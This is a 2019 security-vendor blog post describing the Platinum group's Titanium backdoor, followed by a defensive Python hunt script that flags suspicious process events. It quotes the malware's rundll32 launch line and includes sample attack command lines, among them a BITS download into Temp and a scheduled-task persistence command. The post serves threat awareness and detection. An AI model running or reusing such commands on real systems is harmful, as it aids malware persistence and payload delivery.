Top Middle East Cyber Threat - 26 November 2019
At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.
In this blog, I share the top cybersecurity threat our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:
World’s most notorious hacking group strikes again with new Trojan
Platinum is one of the most technologically advanced APT actors, with a traditional focus on the APAC region. During recent investigations, Kaspersky found Platinum using a new backdoor that they call Titanium (named after a password to one of the self-executable archives). Titanium is the final result of a sequence of dropping, downloading and installing stages. The malware hides at every step by mimicking common software (protection-related software, sound driver software, DVD video creation tools, etc.).
Platinum, tracked as TwoForOne by the analysts, has been active for the past ten years, penetrating government institutions, defence organizations, telecommunications organizations and intelligence agencies, specifically in South and Southeast Asia. According to the researchers, Titanium involves “a complex sequence of dropping, downloading and installing stages, with the deployment of a Trojan-backdoor as the final step”. To bypass security software, Titanium uses clever tricks such as encryption, disguising itself as essential drivers, and delivering data steganographically inside PNG images. Once the trojan has infected a system, it drops its final payload by downloading the necessary files using the Windows Background Intelligent Transfer Service (BITS). The Titanium trojan communicates with the C2 server using the cURL tool. To initiate the server command flow, Titanium sends “a base64-encoded request that contains a unique System-ID, computer name, and hard disk serial number.” Once the connection is established, it begins accepting commands.
While Kaspersky researchers have not identified any current activity related to the Titanium trojan, there is a chance it is still out there, since the backdoor is difficult to detect owing to its fileless techniques and its use of encryption. As discovered by Microsoft in 2017, Platinum started using the Intel Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication, thus evading conventional traffic monitoring and filtering solutions running on compromised devices.
The hacking group employed multiple artifacts during these attacks, with each of them using the following specific distribution sequence:
- An exploit capable of executing code as a SYSTEM user
- A shellcode to download the next downloader
- A downloader to download an SFX archive that contains a Windows task installation script
- A password-protected SFX archive with a Trojan-backdoor installer
- An installer script (ps1)
- A COM object DLL (a loader)
- The Trojan-backdoor itself
According to Kaspersky’s research team, Platinum apparently uses local intranet websites to deliver the malicious artefacts during the infection process, or a shellcode that gets injected into a system process via a yet-unknown method. In this case the injected process was winlogon.exe.
The shellcode’s only purpose is to gain an initial foothold on a target’s machine by downloading encrypted payloads from a command and control server, decrypting them, and launching the next payload in the infection chain.
The shellcode itself contains position-independent code and doesn’t require previously loaded libraries (except Kernel32.dll). Its sole purpose is to connect to the hardcoded C&C address, download an encrypted payload (the password-protected SFX archive), then decrypt and launch it using the hardcoded unpacking password. The usual command line is:
rundll32 "$temp\IOZwXLeM023.tmp",GetVersionInfo -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw
Each wrapper is usually a COM DLL, with the corresponding exported functions. The main purpose of these libraries is to decrypt and load an encrypted file (previously dropped somewhere) into the system memory (a payload) and then redirect calls to the wrapper itself to the payload’s exported functions. Another type of wrapper DLL is designed to obtain a command line from its exported function argument passed by a caller and create a new process.
Windows task installer (SFX archive)
This is a password-encrypted SFX archive that can be downloaded via BITS Downloader. The main feature of this archive is that it contains the cURL executable code, compiled into a DLL. Its purpose is to install the Windows task to establish persistence in the infected system.
Trojan-Backdoor installer (SFX archive)
The backdoor itself uses an SFX archive which must be launched from the command line using a password to unpack it.
This component is used to download encrypted files from the C&C server then decrypt and launch them.
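The rundll32 launch line above (a non-.dll module in %TEMP% invoked through an exported function, with the unpack password as an argument), the BITS-based download of the task installer, and the injection into winlogon.exe are all observable in process-creation telemetry. The following hunt script is an added example written for this post and is not Kaspersky's or Help AG's code; it runs three simple checks over constructed Sysmon-style sample events (the PIDs, user paths and `intranet.example.local` hostname are made up, and the list of processes winlogon.exe is allowed to spawn is an assumption to tune for your own estate).

```python
import re
from dataclasses import dataclass
from typing import Any, Dict, List, Optional

# Constructed sample process-creation events in a Sysmon-like shape; none of
# these are real telemetry. PIDs, paths and the intranet hostname are made up.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    # benign: rundll32 loading a system DLL from System32
    {"pid": 4120, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # suspicious: Titanium-style launch of a .tmp in %TEMP% via an export, with an unpack password
    {"pid": 5016, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'rundll32 "C:\Users\bob\AppData\Local\Temp\IOZwXLeM023.tmp",GetVersionInfo -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw'},
    # suspicious: a BITS transfer writing a payload into %TEMP%
    {"pid": 5320, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high http://intranet.example.local/share/update.png C:\Users\bob\AppData\Local\Temp\upd.tmp"},
    # benign: winlogon spawning userinit at logon
    {"pid": 5400, "image": r"C:\Windows\System32\userinit.exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe",
     "cmdline": r"C:\Windows\system32\userinit.exe"},
    # suspicious: winlogon (the injected process in the report) spawning a shell that installs a task
    {"pid": 5488, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe",
     "cmdline": r'cmd.exe /c schtasks /create /tn Updater /tr "C:\Users\bob\AppData\Local\Temp\a.ps1"'},
]

TEMP_DIR_RE = re.compile(r"\\temp\\", re.IGNORECASE)
# module path (optionally quoted) followed by ",ExportName"
RUNDLL32_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?)"?\s*,\s*(\w+)', re.IGNORECASE)
# last token of a "bitsadmin /transfer ..." line is the local destination
BITS_TRANSFER_RE = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\b.*\s(\S+)\s*$", re.IGNORECASE)
# assumption: children winlogon.exe normally spawns; tune this allowlist for your estate
WINLOGON_CHILDREN = {"userinit.exe", "logonui.exe", "dwm.exe"}


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_rundll32_module(ev: Dict[str, Any]) -> Optional[Finding]:
    """rundll32 normally loads .dll files from trusted locations; a non-.dll
    module (the report's .tmp) or anything under a Temp directory is worth a look."""
    if _basename(ev["image"]) != "rundll32.exe":
        return None
    m = RUNDLL32_RE.search(ev["cmdline"])
    if not m:
        return None
    module, export = m.group(1), m.group(2)
    if TEMP_DIR_RE.search(module) or not module.lower().endswith(".dll"):
        return Finding(ev["pid"], "rundll32_nondll_module", f"{module},{export}")
    return None


def check_bits_to_temp(ev: Dict[str, Any]) -> Optional[Finding]:
    """BITS jobs that drop files into a Temp directory match the report's
    downloader stage; legitimate update jobs rarely land there."""
    if _basename(ev["image"]) != "bitsadmin.exe":
        return None
    m = BITS_TRANSFER_RE.search(ev["cmdline"])
    if m and TEMP_DIR_RE.search(m.group(1)):
        return Finding(ev["pid"], "bits_download_to_temp", m.group(1))
    return None


def check_winlogon_child(ev: Dict[str, Any]) -> Optional[Finding]:
    """winlogon.exe has a small, stable set of children; anything else suggests
    injected code running in it, as in the shellcode stage described above."""
    if _basename(ev["parent_image"]) != "winlogon.exe":
        return None
    child = _basename(ev["image"])
    if child not in WINLOGON_CHILDREN:
        return Finding(ev["pid"], "unexpected_winlogon_child", child)
    return None


CHECKS = (check_rundll32_module, check_bits_to_temp, check_winlogon_child)


def hunt(events: List[Dict[str, Any]]) -> List[Finding]:
    """Apply every check to every event and return the findings in event order."""
    findings: List[Finding] = []
    for ev in events:
        for check in CHECKS:
            f = check(ev)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} detail={f.detail}")
```

In production the event dictionaries would come from your SIEM or EDR rather than the inline list, and the winlogon.exe allowlist should be built from a baseline of your own hosts before alerting on it; the three checks are deliberately narrow so that each finding points at one concrete stage of the infection chain described above.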
Who is at risk?
Unless you are running the sort of corporate-grade security solution that monitors systems for system-wide behavioural indicators of a targeted attack, the odds are that Titanium could make it onto your system without detection. A Kaspersky expert remarks that “the new Titanium APT threat infects systems with any modern Windows OS”. Linux and macOS users are safe, as Kaspersky says that Titanium only executes on Windows systems.
Ensure that good cyber hygiene, as regards clicking links or downloading attachments, is constantly practised. Additionally, ensure the Windows system is kept updated, despite the well-publicised issues there have been with Windows updates generally, and likewise the security solution of choice.